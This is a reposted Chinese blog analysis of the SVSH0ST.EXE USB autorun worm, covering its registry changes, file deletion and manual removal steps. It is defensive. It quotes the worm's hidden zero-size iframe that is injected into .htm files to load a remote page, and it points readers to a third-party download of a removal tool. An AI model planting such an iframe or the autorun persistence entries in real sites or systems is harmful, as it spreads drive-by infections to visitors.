注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

眼睛想旅行

技术就是我的生命与信仰!

 
 
 

日志

 
 
关于我

精通C,C++,python,Erlang。并熟悉各种其他编程语言,用cocos2dx游戏引擎作过几个项目。会MySQL增删改查,了解OpenGL渲染原理。懂单片机,能设计数字电路系统,会画电路图和设计电路板。喜欢了解最新前沿技术,并持续关注和学习新技术。

网易考拉推荐

(SVSH0ST.EXE)病毒的分析解决(来自网络)  

2007-10-21 10:28:17|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

Virus.Win32.AutoRun.cp(SVSH0ST.EXE)病毒的分析解决
作者:佚名  来源:不详  发布时间:2007-7-19 20:32:48

 

  添加项禁止修改主页

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]

"HomePage"=dword:00000001

  其他行为:

  修改 .htm 网页文件,在尾部添加(由生成器指定)

<IfrAmE src=http://www.XXXX.com/test.htm width=0 height=0></IfrAmE>
  删除后辍为 .gho 的文件

  访问 http://ll80.com/xx/xx.HTM 进行统计

  注:

  %system%代表Windows操作系统的系统文件夹路径,并非正式的系统环境变量。

  对于操作系统版本为Windows XP,装在默认路径的系统,%system%指C:\WINDOWS\system32文件夹

  清除方法:

  1. 结束进程(步骤:ctrl+alt+del调用任务管理器)

%System%\SVSH0ST.EXE

  2.删除文件(如无法直接删除,可到down.591ni.cn下载费尔木马强制删除器工具.zip进行强制删除)

%System%\SVSH0ST.EXE

%System%\dpserio1.dll

%System%\autorun.inf

X:\autorun.inf

X:\lcg.exe

  3.删除病毒启动项与禁止修改IE主页项(注册表打开方式:开始菜单-运行-输入“regedit”)

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"svchost"="%System%\SVSH0ST.EXE"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]

"HomePage"=

  4. 修改IE主页(直接打开IE修改).

  5.修复被修改的网页文件

  备注: 此病毒为生成器所生成,在我们的博客上已经有相应报道

        此生成器目前还有诸多bug

 名种U盘病毒大同小异,请大家在使用U盘时一定要注意。本文来自:王国学习联盟(http://www.591ni.cn/home/dir/

 

  评论这张
 
阅读(479)| 评论(1)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017